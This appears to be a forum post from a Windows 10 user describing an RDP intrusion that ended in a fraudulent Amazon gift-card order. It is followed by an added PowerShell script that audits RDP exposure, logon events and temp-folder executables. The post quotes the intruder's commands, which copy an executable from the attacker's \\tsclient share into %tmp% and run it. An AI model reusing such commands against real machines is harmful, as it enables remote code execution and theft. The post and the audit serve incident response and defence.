A few days ago I was welcomed with a command screen showing that someone used the Windows internal tsclient to copy a file into my tmp directory and run it. I had thought that I had TS turned off. Whatever this .exe is was used to RDP into my computer a couple of days later in the middle of the night to pull up my own browser and order a digital gift card from Amazon, which I'm never logged out of.
>copy /y \\tsclient\g\sysscan.exe %tmp%\rsd.exe
>%tmp%\rsd.exe 775157 0 1
I even had the RDP port changed from default and it is forwarded to the static IP of this machine, which is always on. How did they first gain TS access if I had left it on? Is it really that easy? Second, RDP access? Easy enough if I don't use an MS Live account and they were able to retrieve my NT pw? Or did they insert their own credentials?
Also, does anyone know what this rsd.exe is or what it does, so I can try and track down what was changed? I have not made an image backup in probably 6 months and really, really would not like to go back that far. Also, what can I do to prevent this again? I know that I should make sure TS is turned off and probably have certs for the RDP, but is there anything else?
Win10Pro x64. Webroot AV and "firewall", Win10 Firewall
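An added defender-side check, not from the original poster, in PowerShell: it audits the settings and logs that matter for this kind of RDP abuse (whether Remote Desktop is enabled, the listener port and NLA setting, whether client drive redirection, which is what the `\\tsclient` share relies on, is blocked), lists recent RDP logons and executables recently written to %TEMP%, and ends with the hardening commands commented out. It assumes an elevated PowerShell on the affected Win10 host and an arbitrary 30-day look-back window.

```powershell
# Added example (not the poster's): audit RDP exposure and look for traces of the described activity.
# Run from an elevated PowerShell prompt on the affected Windows 10 machine.
$ts    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$tcp   = "$ts\WinStations\RDP-Tcp"
$since = (Get-Date).AddDays(-30)   # look-back window (assumption: 30 days)

# 1. Is Remote Desktop actually enabled, on which port, is NLA required, is drive redirection blocked?
$cfg = [pscustomobject]@{
    RdpEnabled           = ((Get-ItemProperty $ts).fDenyTSConnections -eq 0)
    ListenerPort         = (Get-ItemProperty $tcp).PortNumber
    NlaRequired          = ((Get-ItemProperty $tcp).UserAuthentication -eq 1)
    DriveRedirectBlocked = ((Get-ItemProperty $tcp -ErrorAction SilentlyContinue).fDisableCdm -eq 1)
}
$cfg | Format-List

# 2. Successful RDP logons: Security event 4624 with LogonType 10 (RemoteInteractive),
#    account and source address read from the event XML.
$rdpLogons = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624; StartTime=$since} -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d   = ([xml]$_.ToXml()).Event.EventData.Data
        $get = { param($n) ($d | Where-Object Name -eq $n).'#text' }
        if ((& $get 'LogonType') -eq '10') {
            [pscustomobject]@{ Time = $_.TimeCreated; User = (& $get 'TargetUserName'); Source = (& $get 'IpAddress') }
        }
    }
$rdpLogons | Sort-Object Time | Format-Table -AutoSize

# 3. Remote Desktop connection log: event 1149 records user and remote address per connection.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational'; Id=1149; StartTime=$since} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{n='User'; e={$_.Properties[0].Value}}, @{n='Source'; e={$_.Properties[2].Value}} |
    Format-Table -AutoSize

# 4. Executables recently written to the user temp folder (the copy in the post landed in %tmp%).
Get-ChildItem $env:TEMP -Filter *.exe -File -ErrorAction SilentlyContinue |
    Where-Object LastWriteTime -gt $since |
    Select-Object Name, LastWriteTime, Length, @{n='SHA256'; e={(Get-FileHash $_.FullName).Hash}} |
    Format-Table -AutoSize

# 5. Hardening, once the host is cleaned: turn RDP off entirely, or if it must stay on,
#    require NLA and block client drive redirection so \\tsclient\* can no longer be mapped.
# Set-ItemProperty $ts  -Name fDenyTSConnections -Value 1
# Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'
# Set-ItemProperty $tcp -Name UserAuthentication -Value 1
# Set-ItemProperty $tcp -Name fDisableCdm -Value 1
```

The SHA256 values from step 4 are what to submit to a malware lookup service to identify what rsd.exe actually is.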